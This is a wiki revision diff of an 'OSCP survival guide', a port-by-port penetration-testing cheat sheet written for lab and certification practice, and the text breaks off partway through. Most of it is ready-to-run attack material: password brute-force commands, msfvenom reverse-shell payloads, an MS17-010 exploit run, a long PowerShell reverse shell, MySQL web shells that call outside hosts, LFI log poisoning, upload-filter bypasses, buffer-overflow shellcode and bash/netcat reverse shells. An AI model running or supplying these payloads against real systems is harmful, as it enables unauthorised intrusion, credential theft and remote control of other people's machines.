Outils d'utilisateurs

Outils du Site


oscp_survival_guide

Différences

Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.

Lien vers cette vue

oscp_survival_guide [2020/11/25 14:16]
M0N5T3R
oscp_survival_guide [2021/02/06 22:47] (Version actuelle)
M0N5T3R
Ligne 1: Ligne 1:
- 
 ---- ----
  
Ligne 2463: Ligne 2462:
       `use exploit/windows/smb/eternalblue_doublepulsar       `use exploit/windows/smb/eternalblue_doublepulsar
       msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10       msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10
-      RHOST => 10.11.1.73+      RHOST => 10.11.1.x
       msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe       msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe
       PROCESSINJECT => spoolsv.exe       PROCESSINJECT => spoolsv.exe
Ligne 2718: Ligne 2717:
 -   Transfer files to windows machines -   Transfer files to windows machines
     https://blog.netspi.com/15-ways-to-download-a-file/     https://blog.netspi.com/15-ways-to-download-a-file/
 +
 +</code>
 +
          
-EDIT: +====== EDIT: Useful and fast exploit - Cheat sheet ====== 
-Useful and fast exploit :+ 
 +**Port 22 - SSH**  
 +<code> 
 +hydra -l $USERNAME -P /usr/share/wordlists/wfuzz/others/common_pass.txt ssh://$RHOST 
 +</code> 
 + 
 + 
 +**Port 25 - SMTP **  
 +<code> 
 +nc 10.11.1.217 25 
 +[...] 
 +VRFY root 
 +252 2.0.0 root 
 +</code> 
 + 
 + 
 + 
 +**Port 53 - DNS**  
 +<code> 
 +dig axfr @$RHOST DOMAIN.COM 
 +dnsrecon -d DOMAIN.COM 
 +</code> 
 + 
 + 
 + 
 +**Port 69 - UDP - TFTP** 
 +<code>#nmap -p69 --script=tftp-enum.nse 10.11.1.111</code> 
 + 
 +#exploit AT-TFTP 1.9 : https://github.com/brianwrf/cve-2006-6184 
 +<code>perl -e 'print ""\x81\xec\xac\x0d\x00\x00""' > stackadj 
 +msfvenom -p windows/shell/reverse_nonx_tcp LHOST=10.11.0.x LPORT=443 R > payload 
 +cat stackadj payload > shellcode 
 +cat shellcode | msfvenom -e x86/shikata_ga_nai -b ""\x00"" -a x86 --platform win -f python 
 +</code> 
 + 
 +**Port 88 - Kerberos**  
 +<code> 
 +- MS14-068 
 +- GetUserSPNs 
 +GET USERS: 
 +nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN.LOCAL'" IP 
 +use auxiliary/gather/kerberos_enumusers 
 +https://www.tarlogic.com/blog/como-funciona-kerberos/ 
 +https://www.tarlogic.com/blog/como-atacar-kerberos/ 
 +python kerbrute.py -dc-ip IP -users /root/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt 
 +https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/ 
 +nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN.LOCAL'" IP 
 +use auxiliary/gather/kerberos_enumusers 
 +https://www.tarlogic.com/blog/como-funciona-kerberos/ 
 +https://www.tarlogic.com/blog/como-atacar-kerberos/ 
 +python kerbrute.py -dc-ip IP -users /root/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt 
 +https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/ 
 +</code> 
 + 
 + 
 +**Port 111 - Rpcbind** 
 +<code> 
 +nmap -sV -p 111 --script=rpcinfo $RHOST 
 +nmap -p 111 --script nfs* $RHOST 
 +mount -t nfs -o vers=3 $RHOST:/SHARENAME /mnt 
 +groupadd --gid 1337 pwn 
 +useradd --uid 1337 -g pwn pwn 
 + 
 + 
 + 
 +rpcinfo -p 10.11.1.111 
 +rpcclient -U "" 10.11.1.111 
 + srvinfo 
 + enumdomusers 
 + getdompwinfo 
 + querydominfo 
 + netshareenum 
 + netshareenumall 
 +</code> 
 + 
 + 
 +**Port 135 - MSRPC** 
 +<code>nmap 10.11.1.111 --script=msrpc-enum 
 +msf > use exploit/windows/dcerpc/ms03_026_dcom 
 +</code> 
 + 
 + 
 +**Port 161 -  SNMP** 
 +<code>snmp-check $RHOST 
 +onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt $RHOST 
 +snmpwalk -v1 -c public $RHOST 
 +nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes $IP 
 +nmap -sU -p 161 --script /usr/share/nmap/scripts/snmp-win32-users.nse $IP 
 +</code> 
 + 
 +**Port 139/445 - SMB** 
 +<code># Get Version 
 +smbver.sh 10.11.1.111 
 +Msfconsole;use scanner/smb/smb_version 
 +ngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]'  
 +smbclient -L \\\\10.11.1.111 
 + 
 +# Get Shares 
 +smbmap -H  10.11.1.111 -R <sharename> 
 +echo exit | smbclient -L \\\\10.11.1.111 
 +smbclient \\\\10.11.1.111\\<share> 
 +smbclient -L //10.11.1.111 -N 
 +nmap --script smb-enum-shares -p139,445 -T4 -Pn 10.11.1.111 
 +smbclient -L \\\\10.11.1.111\\ 
 + 
 + 
 +# Check null sessions 
 +smbmap -H 10.11.1.111 
 +rpcclient -U "" -N 10.11.1.111 
 +smbclient //10.11.1.111/IPC$ -N 
 + 
 +# Exploit null sessions 
 +enum -s 10.11.1.111 
 +enum -U 10.11.1.111 
 +enum -P 10.11.1.111 
 +enum4linux -a 10.11.1.111 
 +/usr/share/doc/python3-impacket/examples/samrdump.py 10.11.1.111 
 + 
 +# Connect to username shares 
 +smbclient //10.11.1.111/share -U username 
 + 
 +# Connect to share anonymously 
 +smbclient \\\\10.11.1.111\\<share> 
 +smbclient //10.11.1.111/<share> 
 +smbclient //10.11.1.111/<share\ name> 
 +smbclient //10.11.1.111/<""share name""> 
 +rpcclient -U " " 10.11.1.111 
 +rpcclient -U " " -N 10.11.1.111 
 + 
 +# Check vulns 
 +nmap --script smb-vuln* -p139,445 -T4 -Pn 10.11.1.111 
 + 
 +# Check common security concerns 
 +msfconsole -r /usr/share/metasploit-framwork/scripts/resource/smb_checks.rc 
 + 
 +# Extra validation 
 +msfconsole -r /usr/share/metasploit-framwork/scripts/resource/smb_validate.rc 
 + 
 + 
 +# Multi exploits 
 +msfconsole; use exploit/multi/samba/usermap_script; set lhost 192.168.0.X; set rhost 10.11.1.111; run 
 + 
 +# Bruteforce login 
 +medusa -h 10.11.1.111 -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt  
 +nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt 10.11.1.111  -vvvv 
 +nmap –script smb-brute 10.11.1.111 
 + 
 +# nmap smb enum & vuln  
 +nmap --script smb-enum-*,smb-vuln-*,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-protocols -p 139,445 10.11.1.111 
 +nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse -p 139,445 10.11.1.111 
 + 
 +# Mount smb volume linux 
 +mount -t cifs -o username=user,password=password //x.x.x.x/share /mnt/share 
 + 
 + 
 +# rpcclient commands 
 +rpcclient -U "" 10.11.1.111 
 + srvinfo 
 + enumdomusers 
 + getdompwinfo 
 + querydominfo 
 + netshareenum 
 + netshareenumall 
 + 
 +# Run cmd over smb from linux 
 +winexe -U username //10.11.1.111 "cmd.exe" --system 
 + 
 +# smbmap 
 +smbmap.py -H 10.11.1.111 -u administrator -p asdf1234 #Enum 
 +smbmap.py -u username -p 'P@$$w0rd1234!' -d DOMAINNAME -x 'net group "Domain Admins" /domain' -H 10.11.1.111 #RCE 
 +smbmap.py -H 10.11.1.111 -u username -p 'P@$$w0rd1234!' -L # Drive Listing 
 +smbmap.py -u username -p 'P@$$w0rd1234!' -d ABC -H 10.11.1.111 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.X""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize  ;$p=New-Object System.Diagnostics.Process  ;$p.StartInfo.FileName=""""cmd.exe""""  ;$p.StartInfo.RedirectStandardInput=1  ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0  ;$p.Start()  ;$is=$p.StandardInput  ;$os=$p.StandardOutput  ;Start-Sleep 1  ;$e=new-object System.Text.AsciiEncoding  ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length)  ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}}  if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else {  $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}}  $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"' # Reverse Shell
  
 +# Check
 +\Policies\{REG}\MACHINE\Preferences\Groups\Groups.xml look for user&pass "gpp-decrypt "
  
-exploit SMB VULN MS08-067 : https://0xdf.gitlab.io/2019/02/21/htb-legacy.html+#exploit SMB VULN MS08-067 : https://0xdf.gitlab.io/2019/02/21/htb-legacy.html
 msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.26 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.26 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows
 wget https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py wget https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
Ligne 2733: Ligne 2908:
  
  
-exploit SMB VULN MS1710 MS017-10+#exploit SMB VULN MS1710 MS017-10
 git clone https://github.com/SecureAuthCorp/impacket git clone https://github.com/SecureAuthCorp/impacket
 cd impacket/ cd impacket/
 pip install . pip install .
 git clone https://github.com/helviojunior/MS17-010.git git clone https://github.com/helviojunior/MS17-010.git
-msfvenom -p windows/shell_reverse_tcp LHOST=10.11.17.228 LPORT=443  -f exe -o ms17-010.exe+msfvenom -p windows/shell_reverse_tcp LHOST=10.11.17.LPORT=443  -f exe -o ms17-010.exe
 python send_and_execute.py 10.10.175.236 ms17-010.exe  python send_and_execute.py 10.10.175.236 ms17-010.exe 
 root@kali:~/OSCP/VMs/10.10.14.36/MS17-010# netcat -lnvp 443 root@kali:~/OSCP/VMs/10.10.14.36/MS17-010# netcat -lnvp 443
 listening on [any] 443 ... listening on [any] 443 ...
 C:\WINDOWS\system32> C:\WINDOWS\system32>
 +</code>
  
 +**Port 161/162 UDP - SNMP**
 +<code>nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes 10.11.1.111
 +snmp-check 10.11.1.111 -c public|private|community</code>
  
-exploit AT-TFTP 1.9 : https://github.com/brianwrf/cve-2006-6184 
-perl -e 'print ""\x81\xec\xac\x0d\x00\x00""' > stackadj 
-msfvenom -p windows/shell/reverse_nonx_tcp LHOST=10.11.0.89 LPORT=443 R > payload 
-cat stackadj payload > shellcode 
-cat shellcode | msfvenom -e x86/shikata_ga_nai -b ""\x00"" -a x86 --platform win -f python 
  
-SquirrelMail <= 1.4.23 Remote Code Execution PoC Exploit (CVE-2017-7692) +**Port 389,636 - LDAP ** 
-https://raw.githubusercontent.com/xl7dev/Exploit/master/SquirrelMail/SquirrelMail_RCE_exploit.sh+<code>ldapsearch -h 10.11.1.111 -p 389 -x -b "dc=mywebsite,dc=com" 
 +ldapsearch -x -h 10.11.1.111 -D 'DOMAIN\user' -w 'hash-password' 
 +ldapdomaindump 10.11.1.111 -u 'DOMAIN\user' -p 'hash-password' 
 +patator ldap_login host=10.10.1.111 1=/root/Downloads/passwords_ssh.txt user=hsmith password=FILE1 -x ignore:mesg='Authentication failed.' 
 +</code>
  
-    +**Port 443 - HTTPS** 
 +<code>Read the actual SSL CERT to: 
 +find out potential correct vhost to GET 
 +is the clock skewed 
 +any names that could be usernames for bruteforce/guessing. 
 +sslscan 10.11.1.111:443 
 +./testssl.sh -e -E -f -p  -S -P -c -H -U TARGET-HOST > OUTPUT-FILE.html 
 +nmap -sV --script=ssl-heartbleed 10.1.10.111 
 +mod_ssl,OpenSSL version Openfuck
 </code> </code>
 +
 +**Port  500 - ISAKMP IKE**
 +<code>ike-scan 10.11.1.111</code>
 +
 +**Port 513 - Rlogin**
 +<code>apt install rsh-client
 +rlogin -l root 10.11.1.111
 +</code>
 +
 +**Port 541 - FortiNet SSLVPN**
 +<code>https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/
 +</code>
 +
 +**Port 1433 - MSSQL**
 +<code>nmap -p 1433 -sU --script=ms-sql-info.nse 10.11.1.111
 +use auxiliary/scanner/mssql/mssql_ping
 +use auxiliary/scanner/mssql/mssql_login
 +use exploit/windows/mssql/mssql_payload
 +sqsh -S 10.11.1.111 -U sa
 + xp_cmdshell 'date'
 +</code>
 +
 +**Port 1521 - Oracle**
 +<code>oscanner -s 10.11.1.111 -P 1521
 +tnscmd10g version -h 10.11.1.111
 +tnscmd10g status -h 10.11.1.111
 +nmap -p 1521 -A 10.11.1.111
 +nmap -p 1521 --script=oracle-tns-version,oracle-sid-brute,oracle-brute
 +MSF: good modules under auxiliary/admin/oracle and scanner/oracle
 +
 +./odat-libc2.5-i686 all -s 10.11.1.111 -p 1521
 +./odat-libc2.5-i686 sidguesser -s 10.11.1.111 -p 1521
 +./odat-libc2.5-i686 passwordguesser -s 10.11.1.111 -p 1521 -d XE
 +
 +Upload reverse shell with ODAT:
 +./odat-libc2.5-i686 utlfile -s 10.11.1.111 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ shell.exe /root/shell.exe
 +
 +and run it:
 +./odat-libc2.5-i686 externaltable -s 10.11.1.111 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ shell.exe
 +</code>
 +
 +**Port 2049 - NFS**
 +<code>showmount -e 10.11.1.111
 +If you find anything you can mount it like this:
 +mount 10.11.1.111:/ /tmp/NFS
 +mount -t 10.11.1.111:/ /tmp/NFS
 +</code>
 +
 +
 +**Port 2100 - Oracle XML DB**
 +<code>Default passwords https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm
 +</code>
 +
 +
 +**Port 3306 - MySQL**
 +<code>nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse 10.11.1.111 -p 3306
 +mysql --host=10.11.1.111 -u root -p
 +MYSQL UDF 
 +https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/
 +</code>
 +
 +
 +**Port 3389 - RDP**
 +<code>
 +nmap -p 3389 --script=rdp-vuln-ms12-020.nse
 +rdesktop -u username -p password -g 85% -r disk:share=/root/ 10.11.1.111
 +rdesktop -u guest -p guest 10.11.1.111 -g 94%
 +ncrack -vv --user Administrator -P /root/oscp/passwords.txt rdp://10.11.1.111
 +</code>
 +
 +**VNC - 5900**
 +<code>nmap --script=vnc-info,vnc-brute,vnc-title -p 5900 10.11.1.111
 +</code>
 +
 +
 +**RealVNC**
 +<code>RealVNC : https://www.exploit-db.com/exploits/36932
 +Edit, BIND_ADDR into mine and BIND_PORT into 4444
 +root@kali:~/PWK$python RealVNC-exploit-36932.py
 +[] Please input an IP address to pwn: 10.11.1.x
 +[] Hello From Server: RFB 003.008
 +Ctrl+Alt+Shift+Del will be vmware’s ctrl+alt+del
 +</code>
 +
 +
 +**Port 5985 - WinRM **
 +<code>https://github.com/Hackplayers/evil-winrm
 +gem install evil-winrm
 +evil-winrm -i 10.11.1.111 -u Administrator -p 'password1'
 +evil-winrm -i 10.11.1.111 -u Administrator -H 'hash-pass' -s /scripts/folder
 +</code>
 +
 +
 +
 +**Port 6379 - Redis **
 +<code>https://github.com/Avinash-acid/Redis-Server-Exploit
 +python redis.py 10.10.10.160 redis
 +</code>
 +
 +
 +**Port 8172 - MsDeploy **
 +<code>Microsoft IIS Deploy port
 +IP:8172/msdeploy.axd
 +</code>
 +
 +
 +**Port 8080- Groovy RCE**
 +<code>def process = "cmd /c whoami".execute();println "${process.text}";
 +#Groovy RevShell
 +String host="localhost";
 +int port=8044;
 +String cmd="cmd.exe";
 +Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);Inpu
 +</code>
 +
 +
 +
 +**Port 8080- SquirrelMail <= 1.4.23 Remote Code Execution PoC Exploit (CVE-2017-7692)**
 +<code>https://raw.githubusercontent.com/xl7dev/Exploit/master/SquirrelMail/SquirrelMail_RCE_exploit.sh
 +</code>
 +
 +
 +
 +**XAMPP**
 +<code>XAMPP cred(wampp/xampp)
 +</code>    
 +
 +**ColdFusion (Vulnerable)**
 +<code>Version check : http://example.com/CFIDE/adminapi/base.cfc?wsdl
 +LFI(passowrd file) : http://server/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/ColdFusion8/lib/password.propertiesen
 +(either – neo-security.xml and password.properties)
 +ref : https://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
 +exploit/windows/http/coldfusion_fckeditor – only for 8.0.1
 +</code>
 +
 +
 +**Webdav**
 +<code>
 +WebDav Vulnerability Check : nmap -T4 -p80 --script=http-iis-webdav-vuln 10.11.1.x
 +auxiliary : webdav_test
 +1 cadaver http://10.11.x.x/webdav/
 +Uploading shells.txt to `shells.txt’
 +1 dav:> put shells.txt
 +2 dav:> copy shells.txt shells.asp;.txt
 +</code>
 +
 +
 +**PHPAdmin** 
 +<code>http://.../phpmyadmin
 +db and password located @ /etc/phpmyadmin/config-db.php and default cred can be; (root/blank)(pma/blank)
 +You can also bruteforce by sh hydra 10.10.10.43 -l admin -P /usr/share/dict/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!"
 +</code>
 +
 +
 +**Tomcat** 
 +<code>Default cred for Tomcat;“tomcat/tomcat” and check out /manager console by navigating to browsereg. http://10.11.1.x:8080/manager/html
 +You can upload reverse shell on manager consor ; msfvenom jsp or war file
 +msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.x LPORT=443 -f war > shell.war
 +jar -xvf shell.war
 +</code>
 +
 +**Windows IIS** 
 +<code>Getting Windows 0S and version details through Nikto / Nmap Scanning.
 +auxiliary/admin/http/iis_auth_bypass
 +</code>
 +
 +**mysql**
 +<code>
 +nmap -sV -Pn -vv –script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.0.0.1 -p 3306
 +MySQL login : sh mysql -h 192.168.88.152 -D wordpress -u root -p plbkac
 +MySQL Spawning Reverse shell(linux) : union select ""<?php exec(\""/bin/bash -c \'bash -i >& /dev/tcp/159.203.242.172/1999 0>&1\'\"");"" INTO OUTFILE '/var/www/ecustomers/samshell4.php'
 +UPLOAD A FILE :
 +' union select ""<?php file_put_contents(\""root\"", file_get_contents(\""http://attack.samsclass.info/root\"")); ?>"" INTO OUTFILE '/var/www/ecustomers/samget2.php' #
 +OPEN A PHP SHELL :
 +' union select ""<?php system($_REQUEST['cmd']); ?>"" INTO OUTFILE 
 +</code>
 +
 +
 +
 +**ShellShock**
 +<code>
 +nikto scan results; shows shellshock on /cgi-bin; use 34900.py
 +root@kali:~/Exam/Sicos1# python 34900.py payload=reverse rhost=192.168.88.155 lhost=192.168.88.157 lport=1234
 +[!] Started reverse shell handler
 +[-] Trying exploit on : /cgi-bin/status"
 +</code>
 +
 +
 +**Squid** 
 +<code>proxy scanner/http/squid_pivot_scanning
 +RHOST : Target
 +RANGE : Target
 +RPORT : Squid port
 +msf auxiliary(scanner/http/squid_pivot_scanning) > run
 +[+] [192.168.88.155] 192.168.88.155 is alive but 21 is CLOSED
 +[+] [192.168.88.155] 192.168.88.155:80 seems OPEN
 +if the target uses squid proxy via 3128 port, use nikto with that proxy setting 
 +nikto -h 192.168.88.155 -useproxy http://192.168.88.155:3128"
 +</code>
 +
 +
 +**LFI**
 +<code>
 +fimap -u "http://10.11.1.111/example.php?test="
 +
 +# Ordered output
 +curl -s http://10.11.1.111/gallery.php?page=/etc/passwd
 +/root/Tools/Kadimus/kadimus -u http://10.11.1.111/example.php?page=
 +
 +http://10.11.1.111/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd && base64 -d savefile.php
 +http://10.11.1.111/page=http://10.11.1.111/maliciousfile.txt%00 or ?
 +?page=php://filter/convert.base64-encode/resource=../config.php
 +../../../../../boot.ini
 +
 +amap -d 10.11.1.111 8000
 +
 +# LFI Windows
 +http://10.11.1.111/addguestbook.php?LANG=../../windows/system32/drivers/etc/hosts%00
 +
 +# Contaminating log files
 +root@kali:~# nc -v 10.11.1.111 80
 +10.11.1.111: inverse host lookup failed: Unknown host
 +(UNKNOWN) [10.11.1.111] 80 (http) open
 + <?php echo shell_exec($_GET['cmd']);?> 
 + 
 +http://10.11.1.111/addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=ipconfig
 +</code>
 +
 +
 +
 +**RFI(Remote File Inclusion)** 
 +<code>browse.php?file=http://10.11.0.x/index.html
 +browse.php?file=ftp://10.11.0.x/index.html
 +browse.php?expect://ls
 +
 +Uploading malicious .php file on database 
 +http://hackingandsecurity.blogspot.com/2017/08/proj-12-exploiting-php-vulnerabilities.html
 +</code>
 +
 +
 +**Cookies error padding:**
 +<code>
 +# Get cookie structure
 +padbuster http://10.10.1.111/index.php xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka 8 -cookies "user=xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka" -error "Invalid padding"
 +# Get cookie for other user (impersonation)
 +padbuster http://10.10.1.111/index.php xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka 8 -cookies "user=xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka" -error "Invalid padding" -plaintext 'user=administratorme'
 +</code>
 +
 +
 +
 +**Bypass image upload restrictions**
 +<code>
 +- Change extension: .pHp3 or pHp3.jpg
 +- Modify mimetype: Content-type: image/jpeg
 +- Bypass getimagesize(): exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' file.jpg
 +- Add gif header: GIF89a;
 +- All at the same time.
 +</code>
 +
 +**Password brute force - last resort**
 +<code>
 +cewl
 +hash-identifier
 +john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
 +medusa -h 10.11.1.111 -u admin -P password-file.txt -M http -m DIR:/admin -T 10
 +ncrack -vv --user offsec -P password-file.txt rdp://10.11.1.111
 +crowbar -b rdp -s 10.11.1.111/32 -u victim -C /root/words.txt -n 1
 +hydra -l root -P password-file.txt 10.11.1.111 ssh
 +hydra -P password-file.txt -v 10.11.1.111 snmp
 +hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 10.11.1.111 ftp -V
 +hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 10.11.1.111 pop3 -V
 +hydra -P /usr/share/wordlistsnmap.lst 10.11.1.111 smtp -V
 +
 +# SIMPLE LOGIN GET
 +hydra -L cewl_fin_50.txt -P cewl_fin_50.txt 10.11.1.111 http-get-form "/~login:username=^USER^&password=^PASS^&Login=Login:Unauthorized" -V
 +
 +# GET FORM with HTTPS
 +hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.11.1.111 -s 443 -S https-get-form "/index.php:login=^USER^&password=^PASS^:Incorrect login/password\!"
 +
 +# SIMPLE LOGIN POST
 +hydra -l root@localhost -P cewl 10.11.1.111 http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=-120&User=^USER^&Password=^PASS^:F=Login failed" -I
 +
 +# API REST LOGIN POST
 +hydra -l admin -P /usr/share/wordlists/wfuzz/others/common_pass.txt -V -s 80 10.11.1.111 http-post-form "/centreon/api/index.php?action=authenticate:username=^USER^&password=^PASS^:Bad credentials" -t 64
 +
 +# Dictionary creation
 +https://github.com/LandGrey/pydictor
 +https://github.com/Mebus/cupp
 +git clone https://github.com/sc0tfree/mentalist.git
 +</code>
 +
 +
 +**BOF**
 +<code>
 +# BASIC GUIDE
 +1. Send "A"*1024
 +2. Replace "A" with /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l LENGTH
 +3. When crash "!mona findmsp" (E10.11.1.111 offset) or ""/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q TEXT" or "!mona pattern_offset eip"
 +4. Confirm the location with "B" and "C"
 +5. Check for badchars instead CCCC (ESP):
 +badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
 +with script _badchars.py and 
 +"!mona compare -a esp -f C:\Users\IEUser\Desktop\badchar_test.bin"
 + 5.1 AWESOME WAY TO CHECK BADCHARS (https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/):
 + a. !mona config -set workingfolder c:\logs\%p
 +     b. !mona bytearray -b "\x00\x0d"
 +     c. Copy from c:\logs\%p\bytearray.txt to python exploit and run again
 +     d. !mona compare -f C:\logs\%p\bytearray.bin -a 02F238D0 (ESP address)
 +     e. In " data", before unicode chars it shows badchars.
 + 6. Find JMP ESP with "!mona modules" or "!mona jmp -r esp" or "!mona jmp -r esp -cpb '\x00\x0a\x0d'" find one with security modules "FALSE"
 + 
 + 6.1 Then, "!mona find -s "\xff\xe4" -m PROGRAM/DLL-FALSE"
 + 6.2 Remember put the JMP ESP location in reverse order due to endianness: 5F4A358F will be \x8f\x35\x4a\x5f
 +
 +
 +7. Generate shellcode and place it:
 +msfvenom -p windows/shell_reverse_tcp LHOST=10.11.1.111 LPORT=4433 -f python –e x86/shikata_ga_nai -b "\x00"
 +
 +msfvenom -p windows/shell_reverse_tcp lhost=10.11.1.111 lport=443 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -f python -v shellcode
 +
 +8. Final buffer like:
 +buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode
 +</code>
 +
 +
 +** Reverse Shells **
 +<code>
 +# Linux 
 +bash -i >& /dev/tcp/10.11.1.111/4443 0>&1
 +rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.1.111 4443 >/tmp/f
 +nc -e /bin/sh 10.11.1.111 4443
 +
 +# Python
